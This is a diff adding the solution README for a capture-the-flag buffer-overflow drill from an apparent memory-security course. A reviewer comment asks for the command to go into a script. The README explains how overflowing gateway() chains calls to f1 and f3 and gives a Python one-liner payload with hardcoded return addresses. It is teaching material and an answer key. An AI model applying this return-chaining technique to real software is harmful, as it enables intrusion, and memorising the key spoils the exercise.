chapters/memory-security/ctf/drills/tasks/feeling-chained/solution/README.md

```diff
@@ -0,0 +1,9 @@
+# Solution
+
+By using the buffer overflow in `gateway()`, functions `f1(56, 13)` and `f3(13)` need to be called in this order, with those exact parameters.
+`f3` is the one that actually calls `get_flag()`.
+Calling `get_flag()` directly shouldn't work (a global variable is checked to make sure all steps were made).
+
+```sh
+python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x0c\x87\x04\x08" + b"\xb7\x86\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ./buff-ovf3
+```
```

Comment:
Move this command to a script file. And the same for all `solution/README.md`s. Each solution should have a script file that obtains the flag except for when the solution requires using GDB, linking a file, or anything that cannot be scripted.